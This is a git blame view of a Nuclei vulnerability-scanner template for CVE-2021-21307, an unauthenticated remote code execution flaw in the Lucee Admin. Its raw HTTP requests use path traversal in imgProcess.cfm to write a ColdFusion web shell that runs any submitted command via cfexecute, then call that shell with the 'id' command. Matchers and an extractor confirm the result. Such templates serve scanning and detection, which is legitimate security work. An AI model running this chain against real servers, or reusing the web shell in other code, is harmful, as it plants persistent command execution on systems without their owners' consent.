daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/cves/2021/CVE-2021-21307.yaml

85 lines
2.7 KiB
YAML
Raw Normal View History

Create CVE-2021-21307.yaml
2021-07-18 13:49:19 +00:00
id: CVE-2021-21307
info:
Minor improvements
2021-07-18 17:06:15 +00:00
name: Remote Code Exploit in Lucee Admin
Create CVE-2021-21307.yaml
2021-07-18 13:49:19 +00:00
author: dhiyaneshDk
Minor improvements
2021-07-18 17:06:15 +00:00
severity: critical
description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development. In Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 there is an unauthenticated remote code exploit. This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, one can block access to the Lucee Administrator.
Removed pipe (|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84
2021-08-18 11:37:49 +00:00
reference:
Satisfying the linter (all errors and warnings) * whitespace modifications only
2021-08-19 14:44:46 +00:00
- https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r
- https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-21307
Minor improvements
2021-07-18 17:06:15 +00:00
tags: cve,cve2021,rce,lucee,adobe
Added cve annotations + severity adjustments
2021-09-10 11:26:40 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-21307
cwe-id: CWE-862
Create CVE-2021-21307.yaml
2021-07-18 13:49:19 +00:00
requests:
- raw:
- |
POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
imgSrc=a
- |
POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
imgSrc=
<cfoutput>
Update CVE-2021-21307.yaml
2021-07-18 13:54:46 +00:00
Create CVE-2021-21307.yaml
2021-07-18 13:49:19 +00:00
<table>
<form method="POST" action="">
<tr><td>Command:</td><td><input type=test name="cmd" size=50
<cfif isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td></tr>
<tr><td>Options:</td><td> <input type=text name="opts" size=50
<cfif isdefined("form.opts")>value="#form.opts#"</cfif>><br></td></tr>
<tr><td>Timeout:</td><td> <input type=text name="timeout" size=4
<cfif isdefined("form.timeout")>value="#form.timeout#"
<cfelse> value="5"</cfif>></td></tr>
</table>
<input type=submit value="Exec" >
</form>
<cfif isdefined("form.cmd")>
<cfsavecontent variable="myVar">
<cfexecute name = "#Form.cmd#"
arguments = "#Form.opts#"
timeout = "#Form.timeout#">
</cfexecute>
</cfsavecontent>
<pre>
#HTMLCodeFormat(myVar)#
</pre>
</cfif>
</cfoutput>
removed extra headers not required for template
2021-09-08 12:17:19 +00:00
Create CVE-2021-21307.yaml
2021-07-18 13:49:19 +00:00
- |
POST /lucee/{{randstr}}.cfm HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Update CVE-2021-21307.yaml
2021-07-18 14:03:28 +00:00
cmd=id&opts=&timeout=5
Create CVE-2021-21307.yaml
2021-07-18 13:49:19 +00:00
matchers-condition: and
matchers:
Minor improvements
2021-07-18 17:06:15 +00:00
- type: word
words:
- "uid="
- "gid="
- "groups="
part: body
condition: and
- type: status
status:
- 200
extractors:
Create CVE-2021-21307.yaml
2021-07-18 13:49:19 +00:00
- type: regex
regex:
Minor improvements
2021-07-18 17:06:15 +00:00
- "(u|g)id=.*"